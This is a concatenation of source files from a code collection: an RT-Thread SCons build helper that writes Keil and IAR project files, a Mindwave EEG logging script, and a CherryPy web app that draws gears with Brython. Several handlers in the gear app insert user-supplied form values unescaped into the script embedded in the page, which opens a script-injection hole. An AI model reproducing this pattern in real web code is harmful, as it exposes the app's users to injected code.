basename = os.path.basename(path)
path = _make_path_relative(project_path, path)
path = os.path.join(path, name)
files = SubElement(group, 'Files')
file = SubElement(files, 'File')
file_name = SubElement(file, 'FileName')
name = os.path.basename(path)
if ProjectFiles.count(name):
name = basename + '_' + name
ProjectFiles.append(name)
file_name.text = name.decode(fs_encoding)
file_type = SubElement(file, 'FileType')
file_type.text = '%d' % _get_filetype(name)
file_path = SubElement(file, 'FilePath')
file_path.text = path.decode(fs_encoding)
def MDK4Project(target, script):
project_path = os.path.dirname(os.path.abspath(target))
tree = etree.parse('template.uvproj')
root = tree.getroot()
out = file(target, 'wb')
out.write('<?xml version="1.0" encoding="UTF-8" standalone="no" ?>\n')
CPPPATH = []
CPPDEFINES = []
LINKFLAGS = ''
CCFLAGS = ''
ProjectFiles = []
# add group
groups = tree.find('Targets/Target/Groups')
if not groups:
groups = SubElement(tree.find('Targets/Target'), 'Groups')
for group in script:
group_xml = MDK4AddGroup(ProjectFiles, groups, group['name'], group['src'], project_path)
# get each include path
if group.has_key('CPPPATH') and group['CPPPATH']:
if CPPPATH:
CPPPATH += group['CPPPATH']
else:
CPPPATH += group['CPPPATH']
# get each group's definitions
if group.has_key('CPPDEFINES') and group['CPPDEFINES']:
if CPPDEFINES:
CPPDEFINES += group['CPPDEFINES']
else:
CPPDEFINES += group['CPPDEFINES']
# get each group's link flags
if group.has_key('LINKFLAGS') and group['LINKFLAGS']:
if LINKFLAGS:
LINKFLAGS += ' ' + group['LINKFLAGS']
else:
LINKFLAGS += group['LINKFLAGS']
# remove repeat path
paths = set()
for path in CPPPATH:
inc = _make_path_relative(project_path, os.path.normpath(path))
paths.add(inc) #.replace('\\', '/')
paths = [i for i in paths]
paths.sort()
CPPPATH = string.join(paths, ';')
definitions = [i for i in set(CPPDEFINES)]
CPPDEFINES = string.join(definitions, ', ')
# write include path, definitions and link flags
IncludePath = tree.find('Targets/Target/TargetOption/TargetArmAds/Cads/VariousControls/IncludePath')
IncludePath.text = CPPPATH
Define = tree.find('Targets/Target/TargetOption/TargetArmAds/Cads/VariousControls/Define')
Define.text = CPPDEFINES
Misc = tree.find('Targets/Target/TargetOption/TargetArmAds/LDads/Misc')
Misc.text = LINKFLAGS
xml_indent(root)
out.write(etree.tostring(root, encoding='utf-8'))
out.close()
def MDKProject(target, script):
template = file('template.Uv2', "rb")
lines = template.readlines()
project = file(target, "wb")
project_path = os.path.dirname(os.path.abspath(target))
line_index = 5
# write group
for group in script:
lines.insert(line_index, 'Group (%s)\r\n' % group['name'])
line_index += 1
lines.insert(line_index, '\r\n')
line_index += 1
# write file
ProjectFiles = []
CPPPATH = []
CPPDEFINES = []
LINKFLAGS = ''
CCFLAGS = ''
# number of groups
group_index = 1
for group in script:
# print group['name']
# get each include path
if group.has_key('CPPPATH') and group['CPPPATH']:
if CPPPATH:
CPPPATH += group['CPPPATH']
else:
CPPPATH += group['CPPPATH']
# get each group's definitions
if group.has_key('CPPDEFINES') and group['CPPDEFINES']:
if CPPDEFINES:
CPPDEFINES += ';' + group['CPPDEFINES']
else:
CPPDEFINES += group['CPPDEFINES']
# get each group's link flags
if group.has_key('LINKFLAGS') and group['LINKFLAGS']:
if LINKFLAGS:
LINKFLAGS += ' ' + group['LINKFLAGS']
else:
LINKFLAGS += group['LINKFLAGS']
# generate file items
for node in group['src']:
fn = node.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
basename = os.path.basename(path)
path = _make_path_relative(project_path, path)
path = os.path.join(path, name)
if ProjectFiles.count(name):
name = basename + '_' + name
ProjectFiles.append(name)
lines.insert(line_index, 'File %d,%d,<%s><%s>\r\n'
% (group_index, _get_filetype(name), path, name))
line_index += 1
group_index = group_index + 1
lines.insert(line_index, '\r\n')
line_index += 1
# remove repeat path
paths = set()
for path in CPPPATH:
inc = _make_path_relative(project_path, os.path.normpath(path))
paths.add(inc) #.replace('\\', '/')
paths = [i for i in paths]
CPPPATH = string.join(paths, ';')
definitions = [i for i in set(CPPDEFINES)]
CPPDEFINES = string.join(definitions, ', ')
while line_index < len(lines):
if lines[line_index].startswith(' ADSCINCD '):
lines[line_index] = ' ADSCINCD (' + CPPPATH + ')\r\n'
if lines[line_index].startswith(' ADSLDMC ('):
lines[line_index] = ' ADSLDMC (' + LINKFLAGS + ')\r\n'
if lines[line_index].startswith(' ADSCDEFN ('):
lines[line_index] = ' ADSCDEFN (' + CPPDEFINES + ')\r\n'
line_index += 1
# write project
for line in lines:
project.write(line)
project.close()
def BuilderProject(target, script):
project = file(target, "wb")
project_path = os.path.dirname(os.path.abspath(target))
# write file
CPPPATH = []
CPPDEFINES = []
LINKFLAGS = ''
CCFLAGS = ''
# number of groups
group_index = 1
for group in script:
# print group['name']
# generate file items
for node in group['src']:
fn = node.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
path = _make_path_relative(project_path, path)
path = os.path.join(path, name)
project.write('%s\r\n' % path)
group_index = group_index + 1
project.close()
class Win32Spawn:
def spawn(self, sh, escape, cmd, args, env):
import subprocess
newargs = string.join(args[1:], ' ')
cmdline = cmd + " " + newargs
startupinfo = subprocess.STARTUPINFO()
#startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
penv = {}
for key, value in env.iteritems():
penv[key] = str(value)
proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, startupinfo=startupinfo, shell = False, env=penv)
data, err = proc.communicate()
rv = proc.wait()
if data:
print data
if err:
print err
if rv:
return rv
return 0
def PrepareBuilding(env, root_directory, has_libcpu=False):
import SCons.cpp
import rtconfig
global BuildOptions
global Projects
global Env
global Rtt_Root
Env = env
Rtt_Root = root_directory
# patch for win32 spawn
if env['PLATFORM'] == 'win32' and rtconfig.PLATFORM == 'gcc':
win32_spawn = Win32Spawn()
win32_spawn.env = env
env['SPAWN'] = win32_spawn.spawn
# add program path
env.PrependENVPath('PATH', rtconfig.EXEC_PATH)
# parse rtconfig.h to get used component
PreProcessor = SCons.cpp.PreProcessor()
f = file('rtconfig.h', 'r')
contents = f.read()
f.close()
PreProcessor.process_contents(contents)
BuildOptions = PreProcessor.cpp_namespace
# add target option
AddOption('--target',
dest='target',
type='string',
help='set target project: mdk')
#{target_name:(CROSS_TOOL, PLATFORM)}
tgt_dict = {'mdk':('keil', 'armcc'),
'mdk4':('keil', 'armcc'),
'iar':('iar', 'iar')}
tgt_name = GetOption('target')
if tgt_name:
SetOption('no_exec', 1)
try:
rtconfig.CROSS_TOOL, rtconfig.PLATFORM = tgt_dict[tgt_name]
except KeyError:
print 'Unknow target: %s. Avaible targets: %s' % \
(tgt_name, ', '.join(tgt_dict.keys()))
sys.exit(1)
elif (GetDepend('RT_USING_NEWLIB') == False and GetDepend('RT_USING_NOLIBC') == False) \
and rtconfig.PLATFORM == 'gcc':
AddDepend('RT_USING_MINILIBC')
#env['CCCOMSTR'] = "CC $TARGET"
#env['ASCOMSTR'] = "AS $TARGET"
#env['LINKCOMSTR'] = "Link $TARGET"
# board build script
objs = SConscript('SConscript', variant_dir='build/bsp', duplicate=0)
Repository(Rtt_Root)
# include kernel
objs.append(SConscript('src/SConscript', variant_dir='build/src', duplicate=0))
# include libcpu
if not has_libcpu:
objs.append(SConscript('libcpu/SConscript', variant_dir='build/libcpu', duplicate=0))
# include components
objs.append(SConscript(os.path.join(Rtt_Root, 'components/SConscript'), variant_dir='build/components', duplicate=0))
return objs
def PrepareModuleBuilding(env, root_directory):
import SCons.cpp
import rtconfig
global BuildOptions
global Projects
global Env
global Rtt_Root
Env = env
Rtt_Root = root_directory
# add program path
env.PrependENVPath('PATH', rtconfig.EXEC_PATH)
def GetDepend(depend):
building = True
if type(depend) == type('str'):
if not BuildOptions.has_key(depend) or BuildOptions[depend] == 0:
building = False
elif BuildOptions[depend] != '':
return BuildOptions[depend]
return building
# for list type depend
for item in depend:
if item != '':
if not BuildOptions.has_key(item) or BuildOptions[item] == 0:
building = False
return building
def AddDepend(option):
BuildOptions[option] = 1
def MergeGroup(src_group, group):
src_group['src'] = src_group['src'] + group['src']
if group.has_key('CCFLAGS'):
if src_group.has_key('CCFLAGS'):
src_group['CCFLAGS'] = src_group['CCFLAGS'] + group['CCFLAGS']
else:
src_group['CCFLAGS'] = group['CCFLAGS']
if group.has_key('CPPPATH'):
if src_group.has_key('CPPPATH'):
src_group['CPPPATH'] = src_group['CPPPATH'] + group['CPPPATH']
else:
src_group['CPPPATH'] = group['CPPPATH']
if group.has_key('CPPDEFINES'):
if src_group.has_key('CPPDEFINES'):
src_group['CPPDEFINES'] = src_group['CPPDEFINES'] + group['CPPDEFINES']
else:
src_group['CPPDEFINES'] = group['CPPDEFINES']
if group.has_key('LINKFLAGS'):
if src_group.has_key('LINKFLAGS'):
src_group['LINKFLAGS'] = src_group['LINKFLAGS'] + group['LINKFLAGS']
else:
src_group['LINKFLAGS'] = group['LINKFLAGS']
if group.has_key('LIBRARY'):
if src_group['LIBRARY'].has_key('LIBRARY'):
src_group['LIBRARY'] = src_group['LIBRARY'] + group['LIBRARY']
else:
src_group['LIBRARY'] = group['LIBRARY']
def DefineGroup(name, src, depend, **parameters):
global Env
if not GetDepend(depend):
return []
group = parameters
group['name'] = name
if type(src) == type(['src1', 'str2']):
group['src'] = File(src)
else:
group['src'] = src
if group.has_key('CCFLAGS'):
Env.Append(CCFLAGS = group['CCFLAGS'])
if group.has_key('CPPPATH'):
Env.Append(CPPPATH = group['CPPPATH'])
if group.has_key('CPPDEFINES'):
Env.Append(CPPDEFINES = group['CPPDEFINES'])
if group.has_key('LINKFLAGS'):
Env.Append(LINKFLAGS = group['LINKFLAGS'])
objs = Env.Object(group['src'])
if group.has_key('LIBRARY'):
objs = Env.Library(name, objs)
# merge group
for g in Projects:
if g['name'] == name:
# merge to this group
MergeGroup(g, group)
return objs
# add a new group
Projects.append(group)
return objs
def GetCurrentDir():
conscript = File('SConscript')
fn = conscript.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
return path
def EndBuilding(target):
import rtconfig
Env.AddPostAction(target, rtconfig.POST_ACTION)
if GetOption('target') == 'mdk':
template = os.path.isfile('template.Uv2')
if template:
MDKProject('project.Uv2', Projects)
else:
template = os.path.isfile('template.uvproj')
if template:
MDK4Project('project.uvproj', Projects)
else:
print 'No template project file found.'
if GetOption('target') == 'mdk4':
MDK4Project('project.uvproj', Projects)
if GetOption('target') == 'iar':
IARProject('project.ewp', Projects)
def SrcRemove(src, remove):
if type(src[0]) == type('str'):
for item in src:
if os.path.basename(item) in remove:
src.remove(item)
return
for item in src:
if os.path.basename(item.rstr()) in remove:
src.remove(item)
def GetVersion():
import SCons.cpp
import string
rtdef = os.path.join(Rtt_Root, 'include', 'rtdef.h')
# parse rtdef.h to get RT-Thread version
prepcessor = SCons.cpp.PreProcessor()
f = file(rtdef, 'r')
contents = f.read()
f.close()
prepcessor.process_contents(contents)
def_ns = prepcessor.cpp_namespace
version = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_VERSION']))
subversion = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_SUBVERSION']))
if def_ns.has_key('RT_REVISION'):
revision = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_REVISION']))
return '%d.%d.%d' % (version, subversion, revision)
return '0.%d.%d' % (version, subversion)
|
wuliaodew/RTT
|
tools/building.py
|
Python
|
gpl-2.0
| 20,383
|
import time
import bluetooth
from datetime import datetime
from MindwaveDataPoints import EEGPowersDataPoint, RawDataPoint, MeditationDataPoint, AttentionDataPoint
from MindwaveDataPointReader import MindwaveDataPointReader
if __name__ == '__main__':
mindwaveDataPointReader = MindwaveDataPointReader()
mindwaveDataPointReader.start()
out = ""
print "\n> Gravando dados EEG...\n"
while(True):
dataPoint = mindwaveDataPointReader.readNextDataPoint()
if (dataPoint.__class__ is MeditationDataPoint):
out = str(dataPoint)
#print dataPoint
elif (dataPoint.__class__ is AttentionDataPoint):
out = out + ";" + str(dataPoint)
#print dataPoint
#else (not dataPoint.__class__ is RawDataPoint):
elif (dataPoint.__class__ is EEGPowersDataPoint):
out = datetime.strftime(datetime.now(), '%d-%b-%Y %H:%M:%S')+";"+out + ";" + str(dataPoint) + "\n"
#print out
output_file = file('testCasesEEG.txt','a')
output_file.write(out)
out = ""
output_file.close()
print "\n> Fim da gravacao de dados EEG!\n"
|
gubertoli/hackrun-eeg
|
mindwave/read_mindwave_mobile.py
|
Python
|
gpl-2.0
| 1,077
|
#@+leo-ver=5-thin
#@+node:2014fall.20141212095015.1775: * @file wsgi.py
# coding=utf-8
# 上面的程式內容編碼必須在程式的第一或者第二行才會有作用
################# (1) 模組導入區
# 導入 cherrypy 模組, 為了在 OpenShift 平台上使用 cherrypy 模組, 必須透過 setup.py 安裝
#@@language python
#@@tabwidth -4
#@+<<declarations>>
#@+node:2014fall.20141212095015.1776: ** <<declarations>> (wsgi)
import cherrypy
# 導入 Python 內建的 os 模組, 因為 os 模組為 Python 內建, 所以無需透過 setup.py 安裝
import os
# 導入 random 模組
import random
# 導入 gear 模組
import gear
################# (2) 廣域變數設定區
# 確定程式檔案所在目錄, 在 Windows 下有最後的反斜線
_curdir = os.path.join(os.getcwd(), os.path.dirname(__file__))
# 設定在雲端與近端的資料儲存目錄
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# 表示程式在雲端執行
download_root_dir = os.environ['OPENSHIFT_DATA_DIR']
data_dir = os.environ['OPENSHIFT_DATA_DIR']
else:
# 表示程式在近端執行
download_root_dir = _curdir + "/local_data/"
data_dir = _curdir + "/local_data/"
'''以下為近端 input() 與 for 迴圈應用的程式碼, 若要將程式送到 OpenShift 執行, 除了採用 CherryPy 網際框架外, 還要轉為 html 列印
# 利用 input() 取得的資料型別為字串
toprint = input("要印甚麼內容?")
# 若要將 input() 取得的字串轉為整數使用, 必須利用 int() 轉換
repeat_no = int(input("重複列印幾次?"))
for i in range(repeat_no):
print(toprint)
'''
#@-<<declarations>>
#@+others
#@+node:2014fall.20141212095015.1777: ** class Hello
################# (3) 程式類別定義區
# 以下改用 CherryPy 網際框架程式架構
# 以下為 Hello 類別的設計內容, 其中的 object 使用, 表示 Hello 類別繼承 object 的所有特性, 包括方法與屬性設計
class Hello(object):
# Hello 類別的啟動設定
_cp_config = {
'tools.encode.encoding': 'utf-8',
'tools.sessions.on' : True,
'tools.sessions.storage_type' : 'file',
#'tools.sessions.locking' : 'explicit',
# session 以檔案儲存, 而且位於 data_dir 下的 tmp 目錄
'tools.sessions.storage_path' : data_dir+'/tmp',
# session 有效時間設為 60 分鐘
'tools.sessions.timeout' : 60
}
#@+others
#@+node:2014fall.20141212095015.2004: *3* __init__
def __init__(self):
# 配合透過案例啟始建立所需的目錄
if not os.path.isdir(data_dir+'/tmp'):
os.mkdir(data_dir+'/tmp')
if not os.path.isdir(data_dir+"/downloads"):
os.mkdir(data_dir+"/downloads")
if not os.path.isdir(data_dir+"/images"):
os.mkdir(data_dir+"/images")
#@+node:2014fall.20141212095015.1778: *3* index_orig
# 以 @ 開頭的 cherrypy.expose 為 decorator, 用來表示隨後的成員方法, 可以直接讓使用者以 URL 連結執行
@cherrypy.expose
# index 方法為 CherryPy 各類別成員方法中的內建(default)方法, 當使用者執行時未指定方法, 系統將會優先執行 index 方法
# 有 self 的方法為類別中的成員方法, Python 程式透過此一 self 在各成員方法間傳遞物件內容
def index_orig(self, toprint="Hello World!"):
return toprint
#@+node:2014fall.20141212095015.1779: *3* hello
@cherrypy.expose
def hello(self, toprint="Hello World!"):
return toprint
#@+node:2014fall.20141215194146.1791: *3* index
@cherrypy.expose
def twoDgear(self, guess=None):
# 將標準答案存入 answer session 對應區
theanswer = random.randint(1, 100)
thecount = 0
# 將答案與計算次數變數存進 session 對應變數
cherrypy.session['answer'] = theanswer
cherrypy.session['count'] = thecount
# 印出讓使用者輸入的超文件表單
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<form method=POST action=doCheck>
請輸入您所猜的整數:<input type=text name=guess><br />
<input type=submit value=send>
</form>
<hr>
<!-- 以下在網頁內嵌 Brython 程式 -->
<script type="text/python">
from browser import document, alert
def echo(ev):
alert(document["zone"].value)
# 將文件中名稱為 mybutton 的物件, 透過 click 事件與 echo 函式 bind 在一起
document['mybutton'].bind('click',echo)
</script>
<input id="zone"><button id="mybutton">click !</button>
<hr>
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
import math
# 畫布指定在名稱為 plotarea 的 canvas 上
# 以下使用中文變數名稱
畫布 = document["plotarea"]
ctx = 畫布.getContext("2d")
# 用紅色畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(0, 500)
ctx.strokeStyle = "red"
ctx.stroke()
# 用藍色再畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 0)
ctx.strokeStyle = "blue"
ctx.stroke()
# 用綠色再畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 500)
ctx.strokeStyle = "green"
ctx.stroke()
# 用黑色畫一個圓
ctx.beginPath()
ctx.lineWidth = 3
ctx.strokeStyle = "black"
ctx.arc(250,250,50,0,2*math.pi)
ctx.stroke()
</script>
<canvas id="plotarea" width="800" height="600"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150330144929.1713: *3* twoDgear
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def index(self, N=None, M=None, P=None):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<form method=POST action=mygeartest>
<p>學號:40123207
<p>齒數:
<p><select name=N>
<option>10
<option>20
<option>30
<option>40
<option>50
</select>
<p>模數:
<p><select name=M>
<option>2
<option>3
<option>4
<option>5
<option>6
<option>7
<option>8
<option>9
<option>10
</select>
<p>壓力角:
<p><select name=P>
<option>14.5
<option>15.0
<option>15.5
<option>16.0
<option>16.5
<option>17.0
<option>17.5
<option>18.0
<option>18.5
<option>19.0
<option>19.5
<option>20.0
</select>
</br>
<p><input type=submit value=send>
</form>
</body>
</html>
'''
return outstring
#@+node:2015.20150331094055.1733: *3* threeDgear
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def threeDgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<form method=POST action=do3Dgear>
齒數:<input type=text name=N><br />
模數:<input type=text name=M><br />
壓力角:<input type=text name=P><br />
<input type=submit value=send>
</form>
</body>
</html>
'''
return outstring
#@+node:2015.20150330144929.1762: *3* do2Dgear
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def do2Dgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
import math
# 畫布指定在名稱為 plotarea 的 canvas 上
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
# 用綠色畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
'''
outstring += '''
ctx.moveTo('''+str(N)+","+str(M)+")"
outstring += '''
ctx.lineTo(0, 500)
ctx.strokeStyle = "green"
ctx.stroke()
# 用紅色再畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 0)
ctx.strokeStyle = "blue"
ctx.stroke()
# 用黑色再畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 500)
ctx.strokeStyle = "black"
ctx.stroke()
# 用紅色畫一個圓
ctx.beginPath()
ctx.lineWidth = 3
ctx.strokeStyle = "red"
ctx.arc(250,250,50,0,2*math.pi)
ctx.stroke()
</script>
<canvas id="plotarea" width="800" height="600"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150331094055.1735: *3* do3Dgear
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def do3Dgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
import math
# 畫布指定在名稱為 plotarea 的 canvas 上
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
# 用紅色畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
'''
outstring += '''
ctx.moveTo('''+str(N)+","+str(M)+")"
outstring += '''
ctx.lineTo(0, 500)
ctx.strokeStyle = "red"
ctx.stroke()
# 用藍色再畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 0)
ctx.strokeStyle = "blue"
ctx.stroke()
# 用綠色再畫一條直線
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 500)
ctx.strokeStyle = "green"
ctx.stroke()
# 用黑色畫一個圓
ctx.beginPath()
ctx.lineWidth = 3
ctx.strokeStyle = "black"
ctx.arc(250,250,50,0,2*math.pi)
ctx.stroke()
</script>
<canvas id="plotarea" width="800" height="600"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150330144929.1765: *3* mygeartest
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def mygeartest(self, N=50, M=5, P=20):
D = int(N)*int(M)
outstring = '''
<!DOCTYPE html>
<html>
<head>
您的齒輪在下方。
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
from math import *
# 準備在 id="plotarea" 的 canvas 中繪圖
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
def create_line(x1, y1, x2, y2, width=3, fill="red"):
ctx.beginPath()
ctx.lineWidth = width
ctx.moveTo(x1, y1)
ctx.lineTo(x2, y2)
ctx.strokeStyle = fill
ctx.stroke()
# 導入數學函式後, 圓周率為 pi
# deg 為角度轉為徑度的轉換因子
deg = pi/180.
#
# 以下分別為正齒輪繪圖與主 tkinter 畫布繪圖
#
# 定義一個繪正齒輪的繪圖函式
# midx 為齒輪圓心 x 座標
# midy 為齒輪圓心 y 座標
# rp 為節圓半徑, n 為齒數
def 齒輪(midx, midy, rp, n, 顏色):
# 將角度轉換因子設為全域變數
global deg
# 齒輪漸開線分成 15 線段繪製
imax = 15
# 在輸入的畫布上繪製直線, 由圓心到節圓 y 軸頂點畫一直線
create_line(midx, midy, midx, midy-rp)
# 畫出 rp 圓, 畫圓函式尚未定義
#create_oval(midx-rp, midy-rp, midx+rp, midy+rp, width=2)
# a 為模數 (代表公制中齒的大小), 模數為節圓直徑(稱為節徑)除以齒數
# 模數也就是齒冠大小
a=2*rp/n
# d 為齒根大小, 為模數的 1.157 或 1.25倍, 這裡採 1.25 倍
d=2.5*rp/n
# ra 為齒輪的外圍半徑
ra=rp+a
print("ra:", ra)
# 畫出 ra 圓, 畫圓函式尚未定義
#create_oval(midx-ra, midy-ra, midx+ra, midy+ra, width=1)
# rb 則為齒輪的基圓半徑
# 基圓為漸開線長齒之基準圓
rb=rp*cos('''+str(P)+'''*deg)
print("rp:", rp)
print("rb:", rb)
# 畫出 rb 圓 (基圓), 畫圓函式尚未定義
#create_oval(midx-rb, midy-rb, midx+rb, midy+rb, width=1)
# rd 為齒根圓半徑
rd=rp-d
# 當 rd 大於 rb 時
print("rd:", rd)
# 畫出 rd 圓 (齒根圓), 畫圓函式尚未定義
#create_oval(midx-rd, midy-rd, midx+rd, midy+rd, width=1)
# dr 則為基圓到齒頂圓半徑分成 imax 段後的每段半徑增量大小
# 將圓弧分成 imax 段來繪製漸開線
dr=(ra-rb)/imax
# tan(20*deg)-20*deg 為漸開線函數
sigma=pi/(2*n)+tan('''+str(P)+'''*deg)-'''+str(P)+'''*deg
for j in range(n):
ang=-2.*j*pi/n+sigma
ang2=2.*j*pi/n+sigma
lxd=midx+rd*sin(ang2-2.*pi/n)
lyd=midy-rd*cos(ang2-2.*pi/n)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(alpha-ang)
ypt=r*cos(alpha-ang)
xd=rd*sin(-ang)
yd=rd*cos(-ang)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由左側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
lfx=midx+xpt
lfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# the line from last end of dedendum point to the recent
# end of dedendum point
# lxd 為齒根圓上的左側 x 座標, lyd 則為 y 座標
# 下列為齒根圓上用來近似圓弧的直線
create_line((lxd),(lyd),(midx+xd),(midy-yd),fill=顏色)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(ang2-alpha)
ypt=r*cos(ang2-alpha)
xd=rd*sin(ang2)
yd=rd*cos(ang2)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由右側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
rfx=midx+xpt
rfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# lfx 為齒頂圓上的左側 x 座標, lfy 則為 y 座標
# 下列為齒頂圓上用來近似圓弧的直線
create_line(lfx,lfy,rfx,rfy,fill=顏色)
齒輪(500,500,'''+str(D)+''','''+str(N)+''',"blue")
</script>
<canvas id="plotarea" width="2000" height="1000"></canvas>
</body>
</html>
<a href='index'>返回上一頁</a>
'''
return outstring
#@+node:2015.20150331094055.1737: *3* my3Dgeartest
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def my3Dgeartest(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
from math import *
# 準備在 id="plotarea" 的 canvas 中繪圖
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
def create_line(x1, y1, x2, y2, width=3, fill="red"):
ctx.beginPath()
ctx.lineWidth = width
ctx.moveTo(x1, y1)
ctx.lineTo(x2, y2)
ctx.strokeStyle = fill
ctx.stroke()
# 導入數學函式後, 圓周率為 pi
# deg 為角度轉為徑度的轉換因子
deg = pi/180.
#
# 以下分別為正齒輪繪圖與主 tkinter 畫布繪圖
#
# 定義一個繪正齒輪的繪圖函式
# midx 為齒輪圓心 x 座標
# midy 為齒輪圓心 y 座標
# rp 為節圓半徑, n 為齒數
def 齒輪(midx, midy, rp, n, 顏色):
# 將角度轉換因子設為全域變數
global deg
# 齒輪漸開線分成 15 線段繪製
imax = 15
# 在輸入的畫布上繪製直線, 由圓心到節圓 y 軸頂點畫一直線
create_line(midx, midy, midx, midy-rp)
# 畫出 rp 圓, 畫圓函式尚未定義
#create_oval(midx-rp, midy-rp, midx+rp, midy+rp, width=2)
# a 為模數 (代表公制中齒的大小), 模數為節圓直徑(稱為節徑)除以齒數
# 模數也就是齒冠大小
